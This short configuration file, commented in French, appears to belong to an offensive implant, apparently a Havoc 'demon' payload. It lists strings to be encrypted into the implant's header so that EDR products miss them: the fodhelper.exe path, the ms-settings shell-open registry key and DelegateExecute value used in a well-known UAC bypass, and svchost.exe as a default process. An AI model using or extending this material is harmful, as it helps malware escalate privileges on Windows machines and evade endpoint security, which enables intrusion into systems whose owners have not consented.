# EDR Strings Configuration - À chiffrer
# Format: VAR_NAME:string_content
#
# Les strings seront chiffrées et ajoutées à demon.x64.h
# avec leurs correspondantes: VAR_NAME_enc[] et VAR_NAME_enc_len

fodhelper_path:C:\Windows\System32\fodhelper.exe
registry_path:Software\Classes\ms-settings\shell\open\command
delegate_execute:DelegateExecute
shell_verb:open
default_process:C:\Windows\System32\svchost.exe
